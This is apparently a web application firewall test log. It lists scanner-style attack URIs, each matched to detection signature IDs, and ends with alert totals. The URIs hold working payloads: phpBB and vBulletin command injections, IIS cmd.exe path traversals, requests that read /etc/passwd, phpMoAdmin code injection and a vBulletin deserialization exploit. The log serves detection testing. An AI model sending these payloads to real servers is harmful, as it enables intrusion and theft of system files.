Packet [717]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [718]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [719]	Uri [/web/modules/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [720]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [721]	Uri [/web/forum/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [722]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [723]	Uri [/web/msadc/msadcs.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [725]	Uri [/web/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [726]	Uri [/web/forum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [727]	Uri [/web/forums/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [728]	Uri [/web/forumz/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [729]	Uri [/web/htforum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [730]	Uri [/web/board/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [731]	Uri [/web/community/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [732]	Uri [/web/vb/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [733]	Uri [/web/vbulletin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [736]	Uri [/web/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [737]	Uri [/web/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [738]	Uri [/web/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [739]	Uri [/web/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [740]	Uri [/web/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [741]	Uri [/web/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [742]	Uri [/web/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [743]	Uri [/web/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [744]	Uri [/web/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"]	Nattacks [4 ]	Signatures	[920271]	[920272]	[930100]	[942110]
Packet [745]	Uri [/web/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [746]	Uri [/web/admin/system.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [748]	Uri [/web/admin/exec.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [750]	Uri [/web/isapi/tstisapi.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [751]	Uri [/web/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [752]	Uri [/web/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [753]	Uri [/web/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [754]	Uri [/web/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [755]	Uri [/web/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [756]	Uri [/web/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [757]	Uri [/web/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [758]	Uri [/web/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [759]	Uri [/web/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [760]	Uri [/web/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [761]	Uri [/web/ans/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [768]	Uri [/web/3rdparty/phpMyAdmin/server_sync.php?c=phpinfo()]	Nattacks [1 ]	Signatures	[933160]
Packet [769]	Uri [/web/phpMyAdmin/server_sync.php?c=phpinfo()]	Nattacks [1 ]	Signatures	[933160]
Packet [770]	Uri [/web/3rdparty/phpmyadmin/server_sync.php?c=phpinfo()]	Nattacks [1 ]	Signatures	[933160]
Packet [771]	Uri [/web/phpmyadmin/server_sync.php?c=phpinfo()]	Nattacks [1 ]	Signatures	[933160]
Packet [772]	Uri [/web/pma/server_sync.php?c=phpinfo()]	Nattacks [1 ]	Signatures	[933160]
Packet [774]	Uri [/web/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/etc/passwd%22%26]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942260]
Packet [801]	Uri [/web/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [802]	Uri [/web/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [803]	Uri [/web/phpmoadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [804]	Uri [/web/phpmoadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [805]	Uri [/web/wu-moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [806]	Uri [/web/wu-moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [807]	Uri [/web/moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [808]	Uri [/web/moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [809]	Uri [/web/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [810]	Uri [/web/phpmoadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [811]	Uri [/web/wu-moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [812]	Uri [/web/moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [813]	Uri [/web/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [814]	Uri [/web/phpmoadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [815]	Uri [/web/wu-moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [816]	Uri [/web/moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3 ]	Signatures	[933160]	[933161]	[942431]
Packet [818]	Uri [/web/vb/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]	[933160]	[933170]	[942260]	[942340]	[942430]	[942490]	[942431]	[942460]
Packet [819]	Uri [/web/vbulletin/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]	[933160]	[933170]	[942260]	[942340]	[942430]	[942490]	[942431]	[942460]
Packet [820]	Uri [/web/shell?cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [828]	Uri [/web/login.cgi?cli=aa%20aa%27cat%20/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
Packet [829]	Uri [/web/shell?cat+/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
# N. packets [829], [198] with alerts, N. Alerts [801]
